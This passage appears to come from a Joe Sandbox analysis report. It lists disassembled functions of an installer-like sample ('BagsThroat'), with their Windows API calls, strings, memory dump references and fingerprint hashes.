                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                        Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrcatwsprintf
                                        • String ID: %02x%c$...
                                        • API String ID: 3065427908-1057055748
                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                        Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                        • String ID: Section: "%s"$Skipping section: "%s"
                                        • API String ID: 2266616436-4211696005
                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(?), ref: 00402100
                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                        • String ID:
                                        • API String ID: 1599320355-0
                                        • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                        • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                        Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                        • String ID: Version
                                        • API String ID: 512980652-315105994
                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                        • GetTickCount.KERNEL32 ref: 00403303
                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                        Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                        • String ID:
                                        • API String ID: 2883127279-0
                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                        Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringlstrcmp
                                        • String ID: !N~
                                        • API String ID: 623250636-529124213
                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                        Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                        Strings
                                        • Error launching installer, xrefs: 00405C74
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                        Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CloseHandlelstrlenwvsprintf
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3509786178-2769509956
                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                        Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4